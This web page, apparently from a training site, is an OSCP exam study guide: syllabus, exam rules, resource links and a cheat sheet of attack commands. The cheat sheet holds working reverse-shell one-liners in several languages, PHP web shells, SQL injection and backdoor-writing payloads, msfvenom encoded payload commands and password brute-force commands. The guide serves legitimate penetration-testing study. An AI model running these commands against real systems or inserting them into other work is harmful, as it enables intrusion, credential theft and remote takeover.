OSCP

WHAT IS OSCP ?


The Offensive Security Certified Professional is one of the most technical and most challenging certifications for information security professionals.

In order to become certified you must complete the Penetration Testing with Kali Linux (PwK) course and pass a “24 hour” hands-on exam and you have 24 hours to write a report.

Official Link : PEN-200 | PENETRATION TESTING COURSE & CERTIFICATION

OSCP SYLLABUS


● Getting Comfortable with Kali Linux
● Command Line Fun
● Practical Tools
● Bash Scripting
● Passive Information Gathering
● Active Information Gathering
● Vulnerability Scanning
● Web Application Attacks
● Buffer Overflows
● Client-Side Attacks
● Locating Public Exploits
● Fixing Exploits
● File Transfers
● Antivirus Evasion
● Privilege Escalation
● Password Attacks
● Port Redirection and Tunneling
● Active Directory Attacks
● The Metasploit Framework
● PowerShell Empire
● Penetration Test Breakdown

PREREQUISITES


Before you decide to register for the course you need to have some experience in the following areas :

● Linux Fundamentals : File System, Command Line etc.
● Networking Fundamentals : TCP/IP, Protocols etc.
\ ● Programming Languages : Bash and Python
● Note Taking : Cherry Tree, KeepNote

EXAM DETAILS


● You will have a total of 23 hours and 45 mins for the exam.
● You will be proctored during your exam. Webcam and screen sharing software are required.
● The exam will consist of 5 target systems that are vulnerable and can be compromised.
● You will need a minimum of 70 points or higher to pass.
● If you believe you have enough points you will have another 24 hours to write your report.
● An extra 5 points will be given if you are able to complete the lab report and the course exercises.

Restrictions :

You cannot use any of the following on the exam :

● Spoofing (IP, ARP, DNS, NBNS, etc)
● Commercial tools or services (Metasploit Pro, Burp Pro, etc.)
● Automatic exploitation tools (e.g, browser_autopwn, SQLmap, SQLninja, jsql etc.)
● Mass vulnerability scanners (e.g. Nessus, NeXpose, OpenVAS, Core Impact, SAINT, etc.)

Exam Tips :

● Enumeration is the most important thing you can do.
● Prepare your cheat sheets, notes, tools, and exploits.
● Note Everything.
● Keep Patience, Believe in yourself and Everything will be done easily !!!

LAB SETUP


VMware Workstation or VirtualBox

Kali Linux
▸ If you want to play with the custom image that is made for the course, you can find it here.

Windows 7 (32bit/64bit)

GETTING STARTED WITH KALI LINUX


Kali Linux Revealed
Linux Jounery
Explain Shell
● TryHackMe - Linux Fundamentals
● TryHackMe - Linux Challenges

COMMAND LINE FUN


The Linux Command Line
● The Linux Command Line, 2nd Edition (Book) : Amazon India
● RTFM - Red Team Field Manual (Book) : Amazon India
● BTFM - Blue Team Field Manual (Book) : Amazon India

PRACTICAL TOOLS


● Netcat
● PowerShell
● Wireshark
● Tcpdump

Kali Linux Tools : https://tools.kali.org/tools-listing

BASH SCRIPTING


Bash Resource
● Linux Command Line and Shell Scripting Bible (Book) : Amazon India

PASSIVE INFORMATION GATHERING


In Passive Information Gathering process we are collecting information about the targets using publicly available information.

Taking Notes
● Website Recon : Gather basic information by simply browsing the site.
● Whois Enumeration : Use whois Command on Linux / Online Tool
● Open-Source Code : Search Source-code Online
● Social Media Tools : Gather information on target's social media accounts
● Google Hacking : Cheatsheet / Database
Netcraft
The Recon-ng Framework
Shodan
Spyse
Censys
Security Headers Scanner
SSL Server Test
Pastebin
Email Harvesting
Stack Overflow
OSINT Framework

ACTIVE INFORMATION GATHERING


In Active Information Gathering we can gather more information about these targets by actively interacting with them. for example; Port Scanning, OS Fingerprinting, DNS, SMB, NFS, SMTP, and SNMP enumeration.

The Official Nmap Project Guide
Nmap
Massscan
DNS Recon

VULNERABILITY SCANNING


Nessus / Getting Started with Nessus on Kali Linux
Sn1per
Nexpose
Nipper
Acunetix
OpenVAS

WEB APPLICATION ATTACKS


● Web Application Enumeration : View page source-code, check well known files (robots.Txt, security.txt, .git, readme.md, sitemap.xml etc.), find some files and directories, brute force login pages, check subdomains, find open ports and what web technologies target website is using etc.
Burp Suite
OWASP Top Ten
● The Web Application Hacker's Handbook : Amazon India

CLIENT-SIDE ATTACKS


Types of Client-Side Attacks
● Metasploit Unleashed : Client Side Attacks

FIXING EXPLOITS


Generating our own payload

PASSWORD ATTACKS


Offline Password Cracking :

Hashcat
John the Ripper

Online Password Cracking :

Hydra
Medusa

Wordlist Generators :

Cewl
Crunch

Wordlist :

● Kali Linux includes a lot of dictionary files in the /usr/share/wordlists
Seclists Password Wordlist

Online Password Hash Cracker :

https://crackstation.net/
https://onlinehashcrack.com/
https://gpuhash.me/
https://dcode.fr/hash-function#f0

PORT REDIRECTION AND TUNNELING


SSH Tunneling / Pivoting
Proxychains
SSHuttle
Rinetd
Windows Port Forwarding

THE METASPLOIT FRAMEWORK


https://metasploit.com/
Metasploit Unleashed
● Metasploit: The Penetration Tester's Guide (Book) : Amazon India

PENETRATION TEST BREAKDOWN


Resource will be updated soon.

HELPFUL COMMANDS


SANS Cheat Sheets :

The Ultimate List of SANS Cheat Sheets

NMAP :

nmap -sC -sV -vv -oA quick 10.10.10.10 nmap -sU -sV -vv -oA quick_udp 10.10.10.10 nmap -sC -sV -p- -vv -oA full 10.10.10.10 for x in 7000 8000 9000; do nmap -Pn --host_timeout 201 --maxretries 0 -p $x 10.10.10.10; done


WEB SCANNING :

gobuster -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux gobuster -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux -x .txt,.php nikto -h 10.10.10.10 wpscan -u 10.10.10.10/wp/


PORT CHECKING :

nc -v 10.10.10.10 port telnet 10.10.10.10 port


NETCAT :

Download Netcat for Windows : http://bit.ly/netcat_exe

nc 10.10.10.10 1234 < file.zip nc -l -p 1234 > file.zip


FILE TRANSFER :

Python -m SimpleHTTPServer 80 Python3 -m http.server 80 wget 10.10.10.10/file powershell -c "(new-objectSystem.Net.WebClient).DownloadFile('http://10.10.10.10/file.exe','C:\Users\user\Desktop\file.exe')" python -m pyftpdlib -p 21 -w echo open 10.10.10.10/file.txt > ftp.txt echo USER anonymous >> ftp.txt echo ftp >> ftp.txt echo bin >> ftp.txt echo GET file >> ftp.txt echo bye >> ftp.txt ftp -v -n -s:ftp.txt atftpd --daemon --port 69 /tftp tftp -i 10.10.10.10 GET nc.exe


SSH :

ssh [email protected] ssh -i id_rsa [email protected] ssh-keygen chmod 644 id_rsa.pub chmod 600 id_rsa wget https://raw.githubusercontent.com/truongkma/ctf-tools/master/John/run/sshng2john.py cp sshng2john.py /opt/JohnTheRipper/run/ python /opt/JohnTheRipper/run/sshng2john.py id_rsa > USERHASH john --wordlist=/usr/share/wordlists/rockyou.txt USERHASH hydra -l username -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.10


SSH TUNNELING / PIVOTING :

shuttle -vvr [email protected] 10.0.0.1/24 ssh gateway -L local-port-to-listen:10.10.10.10:remote-port ssh gateway -R remote-port-to-bind:127.0.0.1:local-port ssh -D local-proxy-port -p remote-port 10.10.10.10 plink -l root -pw pass -R 3389:127.0.0.1:3389 10.10.10.10


SMB :

nmap -p 445 -vv --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vulnms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse 10.10.10.10 nmap -p 445 -vv --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.10.10 enum4linux -a 10.10.10.10 rpcclient -U "" 10.10.10.10 smbclient //MOUNT/share


SNMP :

snmp-check 10.10.10.10


REVERSE SHELL :

bash -i >& /dev/tcp/10.10.10.10/4443 0>&1 nc -e /bin/sh 10.10.10.10 4443 nc -e cmd.exe 10.10.10.10 4443 python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect (("10.10.10.10",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' perl -e 'use Socket;$i="10.10.10.10";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")) ;if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' rdesktop -u username -p password -g 85% -r disk:share=/root/ 10.10.10.10 php -r '$sock=fsockopen("10.10.10.10",1234);exec("/bin/sh -i <&3 >&3 2>&3");' ruby -rsocket -e'f=TCPSocket.open("10.10.10.10",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' xterm -display 10.10.10.10:1 Xnest :1 xhost +10.10.10.10


PHP :

< ?php echo system($_GET["cmd"]);?> < ?php echo shell_exec($_GET["cmd"]);?>


POWERSHELL :

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File file.ps1


SQL INJECTION :

sqlmap -u http://10.10.10.10 --crawl=1 sqlmap -u http://10.10.10.10 --dbms=mysql --dump sqlmap -u http://10.10.10.10 --dbms=mysql --os-shell union all select 1,2,3,4,"",6 into OUTFILE 'c:/inetpub/wwwroot/backdoor.php' union all select 1,2,3,4,load_file("c:/windows/system32/drivers/etc/hosts"),6 ' or 1=1 LIMIT 1 -- ' or 1=1 LIMIT 1 -- - ' or 1=1 LIMIT 1# 'or 1# ' or 1=1 -- ' or 1=1 -- -


BRUTE FORCE :

shadow > unshadow.db john unshadow.db hashcat -m 1800 -a 0 hash.txt rockyou.txt --username hashcat -m 500 -a 0 hash.txt rockyou.txt --username hashcat -m 1600 -a 0 hash.txt rockyou.txt hashcat -m 100 -a 0 hash.txt rockyou.txt --force hashcat -m 400 -a 0 --remove hash.txt rockyou.txt ncrack -vv --user offsec -P passwords rdp://10.10.10.10 hydra -l user -P pass.txt -t 10 10.10.10.10 ssh -s 22 medusa -h 10.10.10.10 -u user -P passwords.txt -M ftp


MSFVENOM PAYLOADS :

msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f raw -o shell.php msfvenom -p java/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f war -o shell.war msfvenom -p linux/x86/shell_bind_tcp LPORT=4443 -f c -b "\x00\x0a\x0d\x20" -e x86/shikata_ga_nai msfvenom -p bsd/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f elf -o shell.elf msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f c msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f exe -o non_staged.exe msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f exe -o meterpreter.exe msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 EXITFUNC=thread -f python -o shell.py msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f asp -e x86/shikata_ga_nai -o shell.asp msfvenom -f aspx -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -o shell.aspx msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f js_le -e generic/none -n 18 msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -i 9 -f psh -o shell.ps1 msfvenom -p windows/shell_reverse_tcp -a x86 LHOST=10.10.10.10 LPORT=4443 EXITFUNC=thread -f c -b "\x00\x04" -e x86/shikata_ga_nai msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f exe -o shell.exe msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windowsbinaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe


SHELL SPAWNING :

python -c 'import pty; pty.spawn("/bin/bash")' python3 -c 'import pty; pty.spawn("/bin/bash")' echo $TERM stty -a echo os.system('/bin/bash') /bin/sh -i exec "/bin/sh"; perl —e 'exec "/bin/sh";' exec "/bin/sh" os.execute('/bin/sh') exec "/bin/sh" :!bash :set shell=/bin/bash:shell !sh


PRACTICE LABS


VulnHub :

List of PWK/OSCP Boxes

HackTheBox :

IPPSEC (YouTube)
TJ_Null’s OSCP Prep

TRAINING


Our Paid Training : https://hacktronian.in/training

Share :